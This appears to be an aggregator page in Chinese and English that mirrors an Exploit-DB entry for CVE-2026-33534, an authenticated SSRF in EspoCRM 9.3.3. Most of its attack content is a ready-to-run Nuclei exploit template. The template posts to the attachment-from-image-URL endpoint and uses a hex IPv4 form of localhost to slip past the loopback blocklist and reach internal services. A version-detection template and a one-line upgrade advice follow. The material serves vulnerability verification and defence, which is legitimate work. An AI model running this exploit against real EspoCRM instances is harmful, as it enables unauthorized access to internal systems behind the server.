[webapps] EspoCRM 9.3.3 - SSRF
CVE-2026-33534
漏洞
High · CVSS N/A📋 漏洞基础信息
| CVE | CVE-2026-33534 |
|---|---|
| 漏洞类型 | 漏洞 |
| 受影响版本 | 详见原文 |
| 危害等级 | High · CVSS N/A |
| 发布日期 | 2026-05-27 |
| 提交者 | Max Gabriel (https://github.com/EntroVyx) |
| 来源 | Exploit-DB 原文 ↗ |
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2026-33534-exploit
info:
name: EspoCRM 9.3.3 - Authenticated SSRF via Alternative IPv4 Notation
author: vulnerability-researcher
severity: high
description: EspoCRM 9.3.3 suffers from an SSRF vulnerability that allows authenticated users to bypass the 127.0.0.1 blocklist using alternative IPv4 notations such as octal, hex, decimal dword, and short forms.
reference:
- https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
classification:
cvss-score: 7.5
cve-id: CVE-2026-33534
variables:
username: "{{username}}"
password: "{{password}}"
field: "avatar"
parent_type: "User"
parent_id: ""
internal_port: "8083"
internal_path: "/client/img/logo-light.svg"
payload: "0x7f000001"
http:
- raw:
- |-
POST /api/v1/Attachment/fromImageUrl HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username ~ ':' ~ password)}}
Content-Type: application/json
Accept: application/json
{"url":"{{BaseURL}}:{{internal_port}}{{internal_path}}","field":"{{field}}","parentType":"{{parent_type}}"{{if parent_id}},"parentId":"{{parent_id}}"{{end}}}
- |-
POST /api/v1/Attachment/fromImageUrl HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username ~ ':' ~ password)}}
Content-Type: application/json
Accept: application/json
{"url":"http://{{payload}}:{{internal_port}}{{internal_path}}","field":"{{field}}","parentType":"{{parent_type}}"{{if parent_id}},"parentId":"{{parent_id}}"{{end}}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '"id"'
- '"type"'
condition: and
- type: regex
part: body
regex:
- '"id":"[a-f0-9]+'
- '"type":"[^"]+"'
condition: or🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-33534-detection
info:
name: EspoCRM 9.3.3 - SSRF Detection
author: vulnerability-researcher
severity: high
description: Detect EspoCRM version to check if vulnerable to CVE-2026-33534
reference:
- https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
classification:
cvss-score: 7.5
cve-id: CVE-2026-33534
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/App/user"
- "{{BaseURL}}/client/cfg/version.json"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
part: body
regex:
- '"version":"9\.\d\.\d"'
- '9\.3\.\d'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- '"version":"([^"]+)"'
- '9\.\d\.\d'🛡️ 修复建议
请升级到厂商最新安全版本。
📎 参考链接
🚨 威胁评估
| 📈 EPSS 利用概率 | 暂无数据 |
| 🚨 CISA KEV | 未被已知利用 |
| 🔧 公开 PoC | 暂无公开 PoC |
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-28 08:10 | 来源: Exploit-DB